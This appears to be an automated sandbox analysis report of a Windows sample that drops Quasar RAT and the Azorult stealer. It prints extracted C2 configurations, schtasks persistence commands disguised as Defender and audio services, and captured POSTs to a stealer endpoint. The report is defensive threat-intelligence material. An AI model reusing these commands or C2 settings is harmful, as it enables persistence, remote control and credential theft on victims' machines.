Analysis
-
max time kernel
3s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-01-2025 23:33
Behavioral task
behavioral1
Sample
498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
Resource
win10v2004-20241007-en
General
-
Target
498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
-
Size
2.0MB
-
MD5
b342fc1721147d746388d4bf6c987a04
-
SHA1
bcb7f37269b927d2607578804be99ce1eb85f72a
-
SHA256
498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28
-
SHA512
2f64b632fa7b9c11f0cad0920ae348f5967535f91a449b2619641c227ca1e89ed9391c80dd3fe4285ff50978f62b573e1824312fdc3daf53ad20c61b1840dca5
-
SSDEEP
24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKY4:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Ya
Malware Config
Extracted
quasar
1.3.0.0
EbayProfiles
5.8.88.191:443
sockartek.icu:443
QSR_MUTEX_0kBRNrRz5TDLEQouI0
-
encryption_key
MWhG6wsClMX8aJM2CVXT
-
install_name
winsock.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
win defender run
-
subdirectory
SubDir
Extracted
azorult
http://0x21.in:8000/_az/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Quasar family
-
Quasar payload 3 IoCs
resource yara_rule behavioral1/files/0x0008000000015dc3-17.dat family_quasar behavioral1/memory/2616-46-0x0000000000A60000-0x0000000000ABE000-memory.dmp family_quasar behavioral1/memory/2972-64-0x0000000000990000-0x00000000009EE000-memory.dmp family_quasar -
Executes dropped EXE 3 IoCs
pid Process 2816 vnc.exe 2616 windef.exe 2972 winsock.exe -
Loads dropped DLL 9 IoCs
pid Process 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2616 windef.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\u: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\v: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\b: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\i: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\r: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\s: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\j: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\k: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\p: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\x: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\a: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\e: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\g: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\h: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\y: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\z: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\w: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\n: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\o: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\q: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\t: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\l: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe File opened (read-only) \??\m: 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2888 set thread context of 2588 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 33 PID 2816 set thread context of 3012 2816 vnc.exe 31 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winsock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2328 schtasks.exe 3036 schtasks.exe 3040 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2816 vnc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2616 windef.exe Token: SeDebugPrivilege 2972 winsock.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2972 winsock.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 2888 wrote to memory of 2816 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 30 PID 2888 wrote to memory of 2816 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 30 PID 2888 wrote to memory of 2816 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 30 PID 2888 wrote to memory of 2816 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 30 PID 2816 wrote to memory of 3012 2816 vnc.exe 31 PID 2816 wrote to memory of 3012 2816 vnc.exe 31 PID 2816 wrote to memory of 3012 2816 vnc.exe 31 PID 2816 wrote to memory of 3012 2816 vnc.exe 31 PID 2816 wrote to memory of 3012 2816 vnc.exe 31 PID 2888 wrote to memory of 2616 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 32 PID 2888 wrote to memory of 2616 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 32 PID 2888 wrote to memory of 2616 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 32 PID 2888 wrote to memory of 2616 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 32 PID 2888 wrote to memory of 2588 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 33 PID 2888 wrote to memory of 2588 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 33 PID 2888 wrote to memory of 2588 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 33 PID 2888 wrote to memory of 2588 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 33 PID 2888 wrote to memory of 2588 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 33 PID 2888 wrote to memory of 2588 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 33 PID 2888 wrote to memory of 2328 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 34 PID 2888 wrote to memory of 2328 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 34 PID 2888 wrote to memory of 2328 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 34 PID 2888 wrote to memory of 2328 2888 498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe 34 PID 2816 wrote to memory of 3012 2816 vnc.exe 31 PID 2816 wrote to memory of 3012 2816 vnc.exe 31 PID 2616 wrote to memory of 3036 2616 windef.exe 37 PID 2616 wrote to memory of 3036 2616 windef.exe 37 PID 2616 wrote to memory of 3036 2616 windef.exe 37 PID 2616 wrote to memory of 3036 2616 windef.exe 37 PID 2616 wrote to memory of 2972 2616 windef.exe 39 PID 2616 wrote to memory of 2972 2616 windef.exe 39 PID 2616 wrote to memory of 2972 2616 windef.exe 39 PID 2616 wrote to memory of 2972 2616 windef.exe 39 PID 2972 wrote to memory of 3040 2972 winsock.exe 40 PID 2972 wrote to memory of 3040 2972 winsock.exe 40 PID 2972 wrote to memory of 3040 2972 winsock.exe 40 PID 2972 wrote to memory of 3040 2972 winsock.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k3⤵
- Maps connected drives based on registry
PID:3012
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3036
-
-
C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2588
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2328
-
Network
-
Remote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 103
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 23:33:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=ded3248e2a265fb55acb3825ed001050|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 103
ResponseHTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 23:33:05 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=fe4cac3602af50c4ceae3bb2a00d9c5c|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 291
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
152 B 3
-
44.221.84.105:8000http://0x21.in:8000/_az/http498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe487 B 870 B 5 5
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
328 B 560 B 4 2
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
44.221.84.105:8000http://0x21.in/_az/http498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe476 B 590 B 5 5
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
374 B 560 B 5 2
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
152 B 3
-
152 B 3
-
152 B 3
-
152 B 3
-
152 B 3
-
152 B 3
-
53 B 69 B 1 1
DNS Request
0x21.in
DNS Response
44.221.84.105
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
53 B 69 B 1 1
DNS Request
0x21.in
DNS Response
44.221.84.105
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
405KB
MD5b8ba87ee4c3fc085a2fed0d839aadce1
SHA1b3a2e3256406330e8b1779199bb2b9865122d766
SHA2564e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
SHA5127a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
-
Filesize
349KB
MD5b4a202e03d4135484d0e730173abcc72
SHA101b30014545ea526c15a60931d676f9392ea0c70
SHA2567050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
SHA512632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb